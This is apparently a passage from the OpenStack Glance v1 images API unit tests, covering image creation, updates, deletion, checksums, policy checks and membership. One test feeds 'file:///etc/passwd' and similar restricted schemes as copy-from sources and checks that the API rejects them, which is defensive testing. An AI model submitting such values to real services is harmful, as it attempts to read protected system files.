'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F',
'x-image-meta-location': 'http://a/b/c.tar.gz'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def _do_test_post_image_content_missing_format(self, missing):
"""Tests creation of an image with missing format"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
header = 'x-image-meta-' + missing.replace('_', '-')
del fixture_headers[header]
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEqual(res.status_int, 400)
def test_add_copy_from_with_restricted_sources(self):
"""Tests creates an image from copy-from with restricted sources"""
header_template = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #F'}
schemas = ["file:///etc/passwd",
"swift+config:///xxx",
"filesystem:///etc/passwd"]
for schema in schemas:
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in six.iteritems(header_template):
req.headers[k] = v
req.headers['x-glance-api-copy-from'] = schema
res = req.get_response(self.api)
self.assertEqual(400, res.status_int)
def test_post_image_content_missing_disk_format(self):
"""Tests creation of an image with missing disk format"""
self._do_test_post_image_content_missing_format('disk_format')
def test_post_image_content_missing_container_type(self):
"""Tests creation of an image with missing container format"""
self._do_test_post_image_content_missing_format('container_format')
def _do_test_put_image_content_missing_format(self, missing):
"""Tests delayed activation of an image with missing format"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
header = 'x-image-meta-' + missing.replace('_', '-')
del fixture_headers[header]
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
image_id = res_body['id']
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_put_image_content_missing_disk_format(self):
"""Tests delayed activation of image with missing disk format"""
self._do_test_put_image_content_missing_format('disk_format')
def test_put_image_content_missing_container_type(self):
"""Tests delayed activation of image with missing container format"""
self._do_test_put_image_content_missing_format('container_format')
def test_update_deleted_image(self):
"""Tests that exception raised trying to update a deleted image"""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
fixture = {'name': 'test_del_img'}
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(image=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
self.assertTrue('Forbidden to update deleted image' in res.body)
def test_delete_deleted_image(self):
"""Tests that exception raised trying to delete a deleted image"""
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the status is deleted
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEqual("deleted", res.headers['x-image-meta-status'])
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
msg = "Image %s not found." % UUID2
self.assertTrue(msg in res.body)
# Verify the status is still deleted
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEqual("deleted", res.headers['x-image-meta-status'])
def test_delete_pending_delete_image(self):
"""
Tests that correct response returned when deleting
a pending_delete image
"""
# First deletion
self.config(delayed_delete=True, scrubber_datadir='/tmp/scrubber')
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the status is pending_delete
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEqual("pending_delete", res.headers['x-image-meta-status'])
# Second deletion
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
self.assertTrue('Forbidden to delete a pending_delete image'
in res.body)
# Verify the status is still pending_delete
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEqual("pending_delete", res.headers['x-image-meta-status'])
def test_register_and_upload(self):
"""
Test that the process of registering an image with
some metadata, then uploading an image file with some
more metadata doesn't mark the original metadata deleted
:see LP Bug#901534
"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3',
'x-image-meta-property-key1': 'value1'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertTrue('id' in res_body)
image_id = res_body['id']
self.assertTrue('/images/%s' % image_id in res.headers['location'])
# Verify the status is queued
self.assertTrue('status' in res_body)
self.assertEqual('queued', res_body['status'])
# Check properties are not deleted
self.assertTrue('properties' in res_body)
self.assertTrue('key1' in res_body['properties'])
self.assertEqual('value1', res_body['properties']['key1'])
# Now upload the image file along with some more
# metadata and verify original metadata properties
# are not marked deleted
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['Content-Type'] = 'application/octet-stream'
req.headers['x-image-meta-property-key2'] = 'value2'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the status is queued
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertTrue('x-image-meta-property-key1' in res.headers,
"Did not find required property in headers. "
"Got headers: %r" % res.headers)
self.assertEqual("active", res.headers['x-image-meta-status'])
def test_disable_purge_props(self):
"""
Test the special x-glance-registry-purge-props header controls
the purge property behaviour of the registry.
:see LP Bug#901534
"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3',
'x-image-meta-property-key1': 'value1'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = "chunk00000remainder"
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertTrue('id' in res_body)
image_id = res_body['id']
self.assertTrue('/images/%s' % image_id in res.headers['location'])
# Verify the status is queued
self.assertTrue('status' in res_body)
self.assertEqual('active', res_body['status'])
# Check properties are not deleted
self.assertTrue('properties' in res_body)
self.assertTrue('key1' in res_body['properties'])
self.assertEqual('value1', res_body['properties']['key1'])
# Now update the image, setting new properties without
# passing the x-glance-registry-purge-props header and
# verify that original properties are marked deleted.
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['x-image-meta-property-key2'] = 'value2'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the original property no longer in headers
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertTrue('x-image-meta-property-key2' in res.headers,
"Did not find required property in headers. "
"Got headers: %r" % res.headers)
self.assertFalse('x-image-meta-property-key1' in res.headers,
"Found property in headers that was not expected. "
"Got headers: %r" % res.headers)
# Now update the image, setting new properties and
# passing the x-glance-registry-purge-props header with
# a value of "false" and verify that second property
# still appears in headers.
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.headers['x-image-meta-property-key3'] = 'value3'
req.headers['x-glance-registry-purge-props'] = 'false'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
# Verify the second and third property in headers
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertTrue('x-image-meta-property-key2' in res.headers,
"Did not find required property in headers. "
"Got headers: %r" % res.headers)
self.assertTrue('x-image-meta-property-key3' in res.headers,
"Did not find required property in headers. "
"Got headers: %r" % res.headers)
def test_publicize_image_unauthorized(self):
"""Create a non-public image then fail to make public"""
rules = {"add_image": '@', "publicize_image": '!'}
self.set_policy_rules(rules)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-is-public': 'false',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'PUT'
req.headers['x-image-meta-is-public'] = 'true'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_update_image_size_header_too_big(self):
"""Tests raises BadRequest for supplied image size that is too big"""
fixture_headers = {'x-image-meta-size': CONF.image_size_cap + 1}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'PUT'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_update_image_size_data_too_big(self):
self.config(image_size_cap=512)
fixture_headers = {'content-type': 'application/octet-stream'}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'PUT'
req.body = 'X' * (CONF.image_size_cap + 1)
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_update_image_size_chunked_data_too_big(self):
self.config(image_size_cap=512)
# Create new image that has no data
req = webob.Request.blank("/images")
req.method = 'POST'
req.headers['x-image-meta-name'] = 'something'
req.headers['x-image-meta-container_format'] = 'ami'
req.headers['x-image-meta-disk_format'] = 'ami'
res = req.get_response(self.api)
image_id = json.loads(res.body)['image']['id']
fixture_headers = {
'content-type': 'application/octet-stream',
'transfer-encoding': 'chunked',
}
req = webob.Request.blank("/images/%s" % image_id)
req.method = 'PUT'
req.body_file = StringIO.StringIO('X' * (CONF.image_size_cap + 1))
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 413)
def test_update_non_existing_image(self):
self.config(image_size_cap=100)
req = webob.Request.blank("images/%s" % _gen_uuid)
req.method = 'PUT'
req.body = 'test'
req.headers['x-image-meta-name'] = 'test'
req.headers['x-image-meta-container_format'] = 'ami'
req.headers['x-image-meta-disk_format'] = 'ami'
req.headers['x-image-meta-is_public'] = 'False'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 404)
def test_update_public_image(self):
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-is-public': 'true',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'PUT'
req.headers['x-image-meta-name'] = 'updated public image'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
def test_get_index_sort_name_asc(self):
"""
Tests that the /images registry API returns list of
public images sorted alphabetically by name in
ascending order.
"""
UUID3 = _gen_uuid()
extra_fixture = {'id': UUID3,
'status': 'active',
'is_public': True,
'disk_format': 'vhd',
'container_format': 'ovf',
'name': 'asdf',
'size': 19,
'checksum': None}
db_api.image_create(self.context, extra_fixture)
UUID4 = _gen_uuid()
extra_fixture = {'id': UUID4,
'status': 'active',
'is_public': True,
'disk_format': 'vhd',
'container_format': 'ovf',
'name': 'xyz',
'size': 20,
'checksum': None}
db_api.image_create(self.context, extra_fixture)
req = webob.Request.blank('/images?sort_key=name&sort_dir=asc')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 3)
self.assertEquals(images[0]['id'], UUID3)
self.assertEquals(images[1]['id'], UUID2)
self.assertEquals(images[2]['id'], UUID4)
def test_get_details_filter_changes_since(self):
"""
Tests that the /images/detail registry API returns list of
public images that have a size less than or equal to size_max
"""
dt1 = timeutils.utcnow() - datetime.timedelta(1)
iso1 = timeutils.isotime(dt1)
date_only1 = dt1.strftime('%Y-%m-%d')
date_only2 = dt1.strftime('%Y%m%d')
date_only3 = dt1.strftime('%Y-%m%d')
dt2 = timeutils.utcnow() + datetime.timedelta(1)
iso2 = timeutils.isotime(dt2)
image_ts = timeutils.utcnow() + datetime.timedelta(2)
hour_before = image_ts.strftime('%Y-%m-%dT%H:%M:%S%%2B01:00')
hour_after = image_ts.strftime('%Y-%m-%dT%H:%M:%S-01:00')
dt4 = timeutils.utcnow() + datetime.timedelta(3)
iso4 = timeutils.isotime(dt4)
UUID3 = _gen_uuid()
extra_fixture = {'id': UUID3,
'status': 'active',
'is_public': True,
'disk_format': 'vhd',
'container_format': 'ovf',
'name': 'fake image #3',
'size': 18,
'checksum': None}
db_api.image_create(self.context, extra_fixture)
db_api.image_destroy(self.context, UUID3)
UUID4 = _gen_uuid()
extra_fixture = {'id': UUID4,
'status': 'active',
'is_public': True,
'disk_format': 'ami',
'container_format': 'ami',
'name': 'fake image #4',
'size': 20,
'checksum': None,
'created_at': image_ts,
'updated_at': image_ts}
db_api.image_create(self.context, extra_fixture)
# Check a standard list, 4 images in db (2 deleted)
req = webob.Request.blank('/images/detail')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 2)
self.assertEqual(images[0]['id'], UUID4)
self.assertEqual(images[1]['id'], UUID2)
# Expect 3 images (1 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' % iso1)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 3)
self.assertEqual(images[0]['id'], UUID4)
self.assertEqual(images[1]['id'], UUID3) # deleted
self.assertEqual(images[2]['id'], UUID2)
# Expect 1 images (0 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' % iso2)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 1)
self.assertEqual(images[0]['id'], UUID4)
# Expect 1 images (0 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' %
hour_before)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 1)
self.assertEqual(images[0]['id'], UUID4)
# Expect 0 images (0 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' %
hour_after)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 0)
# Expect 0 images (0 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' % iso4)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 0)
for param in [date_only1, date_only2, date_only3]:
# Expect 3 images (1 deleted)
req = webob.Request.blank('/images/detail?changes-since=%s' %
param)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
self.assertEquals(len(images), 3)
self.assertEqual(images[0]['id'], UUID4)
self.assertEqual(images[1]['id'], UUID3) # deleted
self.assertEqual(images[2]['id'], UUID2)
# Bad request (empty changes-since param)
req = webob.Request.blank('/images/detail?changes-since=')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_get_images_bad_urls(self):
"""Check that routes collections are not on (LP bug 1185828)"""
req = webob.Request.blank('/images/detail.xxx')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
req = webob.Request.blank('/images.xxx')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
req = webob.Request.blank('/images/new')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
req = webob.Request.blank("/images/%s/members" % UUID1)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank("/images/%s/members.xxx" % UUID1)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_get_images_detailed_unauthorized(self):
rules = {"get_images": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank('/images/detail')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_get_images_unauthorized(self):
rules = {"get_images": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank('/images/detail')
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_store_location_not_revealed(self):
"""
Test that the internal store location is NOT revealed
through the API server
"""
# Check index and details...
for url in ('/images', '/images/detail'):
req = webob.Request.blank(url)
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
res_dict = json.loads(res.body)
images = res_dict['images']
num_locations = sum([1 for record in images
if 'location' in record.keys()])
self.assertEquals(0, num_locations, images)
# Check GET
req = webob.Request.blank("/images/%s" % UUID2)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertFalse('X-Image-Meta-Location' in res.headers)
# Check HEAD
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertFalse('X-Image-Meta-Location' in res.headers)
# Check PUT
req = webob.Request.blank("/images/%s" % UUID2)
req.body = res.body
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
res_body = json.loads(res.body)
self.assertFalse('location' in res_body['image'])
# Check POST
req = webob.Request.blank("/images")
headers = {'x-image-meta-location': 'http://localhost',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
for k, v in headers.iteritems():
req.headers[k] = v
req.method = 'POST'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 201)
res_body = json.loads(res.body)
self.assertFalse('location' in res_body['image'])
def test_image_is_checksummed(self):
"""Test that the image contents are checksummed properly"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
image_contents = "chunk00000remainder"
image_checksum = hashlib.md5(image_contents).hexdigest()
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = image_contents
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals(image_checksum, res_body['checksum'],
"Mismatched checksum. Expected %s, got %s" %
(image_checksum, res_body['checksum']))
def test_etag_equals_checksum_header(self):
"""Test that the ETag header matches the x-image-meta-checksum"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
image_contents = "chunk00000remainder"
image_checksum = hashlib.md5(image_contents).hexdigest()
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = image_contents
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
image = json.loads(res.body)['image']
# HEAD the image and check the ETag equals the checksum header...
expected_headers = {'x-image-meta-checksum': image_checksum,
'etag': image_checksum}
req = webob.Request.blank("/images/%s" % image['id'])
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
for key in expected_headers.keys():
self.assertTrue(key in res.headers,
"required header '%s' missing from "
"returned headers" % key)
for key, value in expected_headers.iteritems():
self.assertEquals(value, res.headers[key])
def test_bad_checksum_prevents_image_creation(self):
"""Test that the image contents are checksummed properly"""
image_contents = "chunk00000remainder"
bad_checksum = hashlib.md5("invalid").hexdigest()
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3',
'x-image-meta-checksum': bad_checksum,
'x-image-meta-is-public': 'true'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
req.headers['Content-Type'] = 'application/octet-stream'
req.body = image_contents
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
# Test that only one image was returned (that already exists)
req = webob.Request.blank("/images")
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
images = json.loads(res.body)['images']
self.assertEqual(len(images), 1)
def test_image_meta(self):
"""Test for HEAD /images/<ID>"""
expected_headers = {'x-image-meta-id': UUID2,
'x-image-meta-name': 'fake image #2'}
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
for key, value in expected_headers.iteritems():
self.assertEquals(value, res.headers[key])
def test_image_meta_unauthorized(self):
rules = {"get_image": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_show_image_basic(self):
req = webob.Request.blank("/images/%s" % UUID2)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertEqual(res.content_type, 'application/octet-stream')
self.assertEqual('chunk00000remainder', res.body)
def test_show_non_exists_image(self):
req = webob.Request.blank("/images/%s" % _gen_uuid())
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_show_image_unauthorized(self):
rules = {"get_image": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank("/images/%s" % UUID2)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 403)
def test_show_image_unauthorized_download(self):
rules = {"download_image": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank("/images/%s" % UUID2)
res = req.get_response(self.api)
self.assertEqual(res.status_int, 403)
def test_delete_image(self):
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(res.body, '')
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404,
res.body)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(res.headers['x-image-meta-deleted'], 'True')
self.assertEquals(res.headers['x-image-meta-status'], 'deleted')
def test_delete_non_exists_image(self):
req = webob.Request.blank("/images/%s" % _gen_uuid())
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_delete_not_allowed(self):
# Verify we can get the image data
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'GET'
req.headers['X-Auth-Token'] = 'user:tenant:'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertEqual(len(res.body), 19)
# Verify we cannot delete the image
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 403)
# Verify the image data is still there
req.method = 'GET'
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
self.assertEqual(len(res.body), 19)
def test_delete_queued_image(self):
"""Delete an image in a queued state
Bug #747799 demonstrated that trying to DELETE an image
that had had its save process killed manually results in failure
because the location attribute is None.
Bug #1048851 demonstrated that the status was not properly
being updated to 'deleted' from 'queued'.
"""
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
# Now try to delete the image...
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s' % res_body['id'])
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(res.headers['x-image-meta-deleted'], 'True')
self.assertEquals(res.headers['x-image-meta-status'], 'deleted')
def test_delete_queued_image_delayed_delete(self):
"""Delete an image in a queued state when delayed_delete is on
Bug #1048851 demonstrated that the status was not properly
being updated to 'deleted' from 'queued'.
"""
self.config(delayed_delete=True)
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-name': 'fake image #3'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
# Now try to delete the image...
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
req = webob.Request.blank('/images/%s' % res_body['id'])
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
self.assertEquals(res.headers['x-image-meta-deleted'], 'True')
self.assertEquals(res.headers['x-image-meta-status'], 'deleted')
def test_delete_protected_image(self):
fixture_headers = {'x-image-meta-store': 'file',
'x-image-meta-name': 'fake image #3',
'x-image-meta-disk-format': 'vhd',
'x-image-meta-container-format': 'ovf',
'x-image-meta-protected': 'True'}
req = webob.Request.blank("/images")
req.method = 'POST'
for k, v in fixture_headers.iteritems():
req.headers[k] = v
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
res_body = json.loads(res.body)['image']
self.assertEquals('queued', res_body['status'])
# Now try to delete the image...
req = webob.Request.blank("/images/%s" % res_body['id'])
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_delete_image_unauthorized(self):
rules = {"delete_image": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank("/images/%s" % UUID2)
req.method = 'DELETE'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 403)
def test_get_details_invalid_marker(self):
"""
Tests that the /images/detail registry API returns a 400
when an invalid marker is provided
"""
req = webob.Request.blank('/images/detail?marker=%s' % _gen_uuid())
res = req.get_response(self.api)
self.assertEquals(res.status_int, 400)
def test_get_image_members(self):
"""
Tests members listing for existing images
"""
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
memb_list = json.loads(res.body)
num_members = len(memb_list['members'])
self.assertEquals(num_members, 0)
def test_get_image_members_allowed_by_policy(self):
rules = {"get_members": '@'}
self.set_policy_rules(rules)
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
memb_list = json.loads(res.body)
num_members = len(memb_list['members'])
self.assertEquals(num_members, 0)
def test_get_image_members_forbidden_by_policy(self):
rules = {"get_members": '!'}
self.set_policy_rules(rules)
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, webob.exc.HTTPForbidden.code)
def test_get_image_members_not_existing(self):
"""
Tests proper exception is raised if attempt to get members of
non-existing image
"""
req = webob.Request.blank('/images/%s/members' % _gen_uuid())
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 404)
def test_add_member(self):
"""
Tests adding image members
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=True)
req = webob.Request.blank('/images/%s/members/test' % UUID2)
req.method = 'PUT'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 201)
def test_get_member_images(self):
"""
Tests image listing for members
"""
req = webob.Request.blank('/shared-images/pattieblack')
req.method = 'GET'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
memb_list = json.loads(res.body)
num_members = len(memb_list['shared_images'])
self.assertEquals(num_members, 0)
def test_replace_members(self):
"""
Tests replacing image members raises right exception
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=False)
fixture = dict(member_id='pattieblack')
req = webob.Request.blank('/images/%s/members' % UUID2)
req.method = 'PUT'
req.content_type = 'application/json'
req.body = json.dumps(dict(image_memberships=fixture))
res = req.get_response(self.api)
self.assertEquals(res.status_int, 401)
def test_active_image_immutable_props_for_user(self):
"""
Tests user cannot update immutable props of active image
"""
test_router_api = router.API(self.mapper)
self.api = test_utils.FakeAuthMiddleware(
test_router_api, is_admin=False)
fixture_header_list = [{'x-image-meta-checksum': '1234'},
{'x-image-meta-size': '12345'}]
for fixture_header in fixture_header_list:
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'PUT'
for k, v in fixture_header.iteritems():
req = webob.Request.blank('/images/%s' % UUID2)
req.method = 'HEAD'
res = req.get_response(self.api)
self.assertEquals(res.status_int, 200)
